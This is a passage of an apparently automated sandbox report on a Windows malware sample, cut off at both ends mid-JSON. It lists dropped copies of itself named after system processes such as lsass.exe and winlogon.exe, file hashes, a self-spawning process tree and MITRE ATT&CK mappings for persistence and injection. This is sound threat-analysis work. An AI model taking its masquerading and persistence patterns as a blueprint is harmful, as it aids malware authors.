"%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 163903, "sha256": "8834c20485439dfad9259b74e8059bebf89f5e061bcfab01585f704aec82bf58", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 163903, "sha256": "6985ea7b0d586caf3261eeb0e42d62c395dc46d8ce9f840d74190ad0956f2895", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINLOGON.EXE", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_path": "%LOCALAPPDATA%\\csrss.exe", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe (PID: 5816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_path": "%LOCALAPPDATA%\\lsass.exe", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe (PID: 5816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services.exe", "file_path": "%LOCALAPPDATA%\\services.exe", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe (PID: 5816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_path": "%LOCALAPPDATA%\\smss.exe", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe (PID: 5816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_path": "%LOCALAPPDATA%\\winlogon.exe", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe (PID: 5816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%WINDIR%\\D3_08.exe", "file_size": 163903, "sha256": "0a356ef5700c653ebad248a108d439b92465de2a0f5fa2652ef9eb4364727838", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 163903, "sha256": "f180ce82bf5cea7c9e6d7825f2be4f5cfc3801bf0dee95852b108d5b7c602c98", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 163903, "sha256": "456d8e768644ea10f94da4d0a01bba989f4a748ae5bb06f8a957757c86be6278", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "C:\\D3_08.exe", "file_size": 163903, "sha256": "6285d0213bdb82b3b9024854f46677ada30f936f42ccbced8a0edd798a660d5d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_path": "C:\\D3_08\\New Folder.exe", "file_size": 163903, "sha256": "7c125af16f3626700420060e6559ddced63400e41380e40fdb12015ef9c424b8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe (PID: 5816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_path": "C:\\Data %OSUSER%.exe", "file_size": 163903, "sha256": "67857f57b257607ae55971046e834c996727eb916aa5b937f2da0be256774a27", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe (PID: 5816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS .exe", "file_size": 46769, "sha256": "b9b4f91e77ceef6eec8f4d3df5046651314c6847a1e7315bf5ddb8053596e0cf", "type_tags": ["data"], "description": "data", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE.bin", "file_size": 163903, "sha256": "6985ea7b0d586caf3261eeb0e42d62c395dc46d8ce9f840d74190ad0956f2895", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE506D.bin", "file_size": 163903, "sha256": "0a356ef5700c653ebad248a108d439b92465de2a0f5fa2652ef9eb4364727838", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 163903, "sha256": "3481755cc0f940287028bd66e13d6bf6eb56b20e3135513d38697c54fe80a647", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4741.bin", "file_size": 163903, "sha256": "67857f57b257607ae55971046e834c996727eb916aa5b937f2da0be256774a27", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE5073.bin", "file_size": 163903, "sha256": "f180ce82bf5cea7c9e6d7825f2be4f5cfc3801bf0dee95852b108d5b7c602c98", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4745.bin", "file_size": 163903, "sha256": "24a20b1cbe97fd6046c9fc5e151ca062bf3ea88325bd5cddd9daa57ea071297e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4E36.bin", "file_size": 163903, "sha256": "ca85a8d0ccf767e8e50c7a4b19599b9860c0aeb76b945a4dd0655d05447fdb23", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4B9C.bin", "file_size": 163903, "sha256": "0a356ef5700c653ebad248a108d439b92465de2a0f5fa2652ef9eb4364727838", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)", "7 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8041)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (9 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005816", "name": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe", "normalized_path": "C:\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe", "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f"}, {"uid": "00000000-00005972", "parentuid": "00000000-00005816", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "67857f57b257607ae55971046e834c996727eb916aa5b937f2da0be256774a27"}, {"uid": "00000000-00003264", "parentuid": "00000000-00005972", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "67857f57b257607ae55971046e834c996727eb916aa5b937f2da0be256774a27"}, {"uid": "00000000-00005852", "parentuid": "00000000-00005972", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "24a20b1cbe97fd6046c9fc5e151ca062bf3ea88325bd5cddd9daa57ea071297e"}, {"uid": "00000000-00006072", "parentuid": "00000000-00005972", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "7a5302f59580bd51335a30d5efff69d4d67edad6f1dd7085b18c441b54622eab"}, {"uid": "00000000-00003964", "parentuid": "00000000-00005972", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "866a96612b0f82269fa371318d39dae0cab396a97caba8ed9cc1d62b2b976ccc"}, {"uid": "00000000-00003836", "parentuid": "00000000-00005972", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "7425dac25115f385a61d117d41e0b000e1eb36e1acdc39d562337dcd8c311d01"}, {"uid": "00000000-00002380", "parentuid": "00000000-00003836", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "67857f57b257607ae55971046e834c996727eb916aa5b937f2da0be256774a27"}, {"uid": "00000000-00004300", "parentuid": "00000000-00003836", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "24a20b1cbe97fd6046c9fc5e151ca062bf3ea88325bd5cddd9daa57ea071297e"}, {"uid": "00000000-00000944", "parentuid": "00000000-00003836", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "7a5302f59580bd51335a30d5efff69d4d67edad6f1dd7085b18c441b54622eab"}, {"uid": "00000000-00003640", "parentuid": "00000000-00003836", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "866a96612b0f82269fa371318d39dae0cab396a97caba8ed9cc1d62b2b976ccc"}, {"uid": "00000000-00001620", "parentuid": "00000000-00003836", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "7425dac25115f385a61d117d41e0b000e1eb36e1acdc39d562337dcd8c311d01"}, {"uid": "00000000-00003672", "parentuid": "00000000-00003836", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cdbc3f640ff4c267b18fb1745cbc0c66ea1da14595ca9cd5ac1643ffbd91d504"}, {"uid": "00000000-00002228", "parentuid": "00000000-00003836", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8239e0dd9c5dfd6eca093868215725f4b956b929d660c28afc3934fe36631f13"}, {"uid": "00000000-00003392", "parentuid": "00000000-00003836", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "0a356ef5700c653ebad248a108d439b92465de2a0f5fa2652ef9eb4364727838"}, {"uid": "00000000-00005088", "parentuid": "00000000-00003836", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ca85a8d0ccf767e8e50c7a4b19599b9860c0aeb76b945a4dd0655d05447fdb23"}, {"uid": "00000000-00004088", "parentuid": "00000000-00005972", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cdbc3f640ff4c267b18fb1745cbc0c66ea1da14595ca9cd5ac1643ffbd91d504"}, {"uid": "00000000-00004308", "parentuid": "00000000-00005972", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8239e0dd9c5dfd6eca093868215725f4b956b929d660c28afc3934fe36631f13"}, {"uid": "00000000-00000304", "parentuid": "00000000-00004308", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "67857f57b257607ae55971046e834c996727eb916aa5b937f2da0be256774a27"}, {"uid": "00000000-00002964", "parentuid": "00000000-00004308", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "24a20b1cbe97fd6046c9fc5e151ca062bf3ea88325bd5cddd9daa57ea071297e"}, {"uid": "00000000-00001312", "parentuid": "00000000-00004308", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "7a5302f59580bd51335a30d5efff69d4d67edad6f1dd7085b18c441b54622eab"}, {"uid": "00000000-00003696", "parentuid": "00000000-00004308", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "866a96612b0f82269fa371318d39dae0cab396a97caba8ed9cc1d62b2b976ccc"}, {"uid": "00000000-00003188", "parentuid": "00000000-00004308", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "7425dac25115f385a61d117d41e0b000e1eb36e1acdc39d562337dcd8c311d01"}, {"uid": "00000000-00003064", "parentuid": "00000000-00004308", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cdbc3f640ff4c267b18fb1745cbc0c66ea1da14595ca9cd5ac1643ffbd91d504"}, {"uid": "00000000-00004216", "parentuid": "00000000-00004308", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8239e0dd9c5dfd6eca093868215725f4b956b929d660c28afc3934fe36631f13"}, {"uid": "00000000-00006136", "parentuid": "00000000-00005816", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "24a20b1cbe97fd6046c9fc5e151ca062bf3ea88325bd5cddd9daa57ea071297e"}, {"uid": "00000000-00004124", "parentuid": "00000000-00006136", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "67857f57b257607ae55971046e834c996727eb916aa5b937f2da0be256774a27"}, {"uid": "00000000-00002428", "parentuid": "00000000-00006136", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "24a20b1cbe97fd6046c9fc5e151ca062bf3ea88325bd5cddd9daa57ea071297e"}, {"uid": "00000000-00003628", "parentuid": "00000000-00006136", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "7a5302f59580bd51335a30d5efff69d4d67edad6f1dd7085b18c441b54622eab"}, {"uid": "00000000-00003916", "parentuid": "00000000-00006136", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "866a96612b0f82269fa371318d39dae0cab396a97caba8ed9cc1d62b2b976ccc"}, {"uid": "00000000-00003976", "parentuid": "00000000-00006136", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "7425dac25115f385a61d117d41e0b000e1eb36e1acdc39d562337dcd8c311d01"}, {"uid": "00000000-00003000", "parentuid": "00000000-00006136", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cdbc3f640ff4c267b18fb1745cbc0c66ea1da14595ca9cd5ac1643ffbd91d504"}, {"uid": "00000000-00002272", "parentuid": "00000000-00006136", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8239e0dd9c5dfd6eca093868215725f4b956b929d660c28afc3934fe36631f13"}, {"uid": "00000000-00004272", "parentuid": "00000000-00005816", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "7a5302f59580bd51335a30d5efff69d4d67edad6f1dd7085b18c441b54622eab"}, {"uid": "00000000-00004340", "parentuid": "00000000-00004272", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "67857f57b257607ae55971046e834c996727eb916aa5b937f2da0be256774a27"}, {"uid": "00000000-00002164", "parentuid": "00000000-00004272", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "24a20b1cbe97fd6046c9fc5e151ca062bf3ea88325bd5cddd9daa57ea071297e"}, {"uid": "00000000-00004068", "parentuid": "00000000-00004272", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "7a5302f59580bd51335a30d5efff69d4d67edad6f1dd7085b18c441b54622eab"}, {"uid": "00000000-00003756", "parentuid": "00000000-00004272", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "866a96612b0f82269fa371318d39dae0cab396a97caba8ed9cc1d62b2b976ccc"}, {"uid": "00000000-00006120", "parentuid": "00000000-00004272", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "7425dac25115f385a61d117d41e0b000e1eb36e1acdc39d562337dcd8c311d01"}, {"uid": "00000000-00002060", "parentuid": "00000000-00004272", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cdbc3f640ff4c267b18fb1745cbc0c66ea1da14595ca9cd5ac1643ffbd91d504"}, {"uid": "00000000-00001772", "parentuid": "00000000-00004272", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8239e0dd9c5dfd6eca093868215725f4b956b929d660c28afc3934fe36631f13"}, {"uid": "00000000-00004132", "parentuid": "00000000-00005816", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "866a96612b0f82269fa371318d39dae0cab396a97caba8ed9cc1d62b2b976ccc"}, {"uid": "00000000-00003360", "parentuid": "00000000-00004132", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "67857f57b257607ae55971046e834c996727eb916aa5b937f2da0be256774a27"}, {"uid": "00000000-00003668", "parentuid": "00000000-00004132", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "24a20b1cbe97fd6046c9fc5e151ca062bf3ea88325bd5cddd9daa57ea071297e"}, {"uid": "00000000-00001440", "parentuid": "00000000-00004132", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "7a5302f59580bd51335a30d5efff69d4d67edad6f1dd7085b18c441b54622eab"}, {"uid": "00000000-00003856", "parentuid": "00000000-00004132", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "866a96612b0f82269fa371318d39dae0cab396a97caba8ed9cc1d62b2b976ccc"}, {"uid": "00000000-00002628", "parentuid": "00000000-00004132", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "7425dac25115f385a61d117d41e0b000e1eb36e1acdc39d562337dcd8c311d01"}, {"uid": "00000000-00003224", "parentuid": "00000000-00004132", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cdbc3f640ff4c267b18fb1745cbc0c66ea1da14595ca9cd5ac1643ffbd91d504"}, {"uid": "00000000-00003120", "parentuid": "00000000-00004132", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8239e0dd9c5dfd6eca093868215725f4b956b929d660c28afc3934fe36631f13"}, {"uid": "00000000-00003016", "parentuid": "00000000-00005816", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "7425dac25115f385a61d117d41e0b000e1eb36e1acdc39d562337dcd8c311d01"}, {"uid": "00000000-00003096", "parentuid": "00000000-00005816", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cdbc3f640ff4c267b18fb1745cbc0c66ea1da14595ca9cd5ac1643ffbd91d504"}, {"uid": "00000000-00002496", "parentuid": "00000000-00003096", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "67857f57b257607ae55971046e834c996727eb916aa5b937f2da0be256774a27"}, {"uid": "00000000-00003460", "parentuid": "00000000-00003096", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "24a20b1cbe97fd6046c9fc5e151ca062bf3ea88325bd5cddd9daa57ea071297e"}, {"uid": "00000000-00004060", "parentuid": "00000000-00003096", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "7a5302f59580bd51335a30d5efff69d4d67edad6f1dd7085b18c441b54622eab"}, {"uid": "00000000-00003164", "parentuid": "00000000-00003096", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "866a96612b0f82269fa371318d39dae0cab396a97caba8ed9cc1d62b2b976ccc"}, {"uid": "00000000-00004808", "parentuid": "00000000-00003096", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "7425dac25115f385a61d117d41e0b000e1eb36e1acdc39d562337dcd8c311d01"}, {"uid": "00000000-00004200", "parentuid": "00000000-00003096", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "cdbc3f640ff4c267b18fb1745cbc0c66ea1da14595ca9cd5ac1643ffbd91d504"}, {"uid": "00000000-00001464", "parentuid": "00000000-00003096", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8239e0dd9c5dfd6eca093868215725f4b956b929d660c28afc3934fe36631f13"}, {"uid": "00000000-00000928", "parentuid": "00000000-00003096", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "0a356ef5700c653ebad248a108d439b92465de2a0f5fa2652ef9eb4364727838"}, {"uid": "00000000-00005148", "parentuid": "00000000-00003096", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ca85a8d0ccf767e8e50c7a4b19599b9860c0aeb76b945a4dd0655d05447fdb23"}, {"uid": "00000000-00006140", "parentuid": "00000000-00005816", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8239e0dd9c5dfd6eca093868215725f4b956b929d660c28afc3934fe36631f13"}, {"uid": "00000000-00001852", "parentuid": "00000000-00005816", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "0a356ef5700c653ebad248a108d439b92465de2a0f5fa2652ef9eb4364727838"}, {"uid": "00000000-00002892", "parentuid": "00000000-00001852", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "0a356ef5700c653ebad248a108d439b92465de2a0f5fa2652ef9eb4364727838"}, {"uid": "00000000-00001192", "parentuid": "00000000-00005816", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ca85a8d0ccf767e8e50c7a4b19599b9860c0aeb76b945a4dd0655d05447fdb23"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", 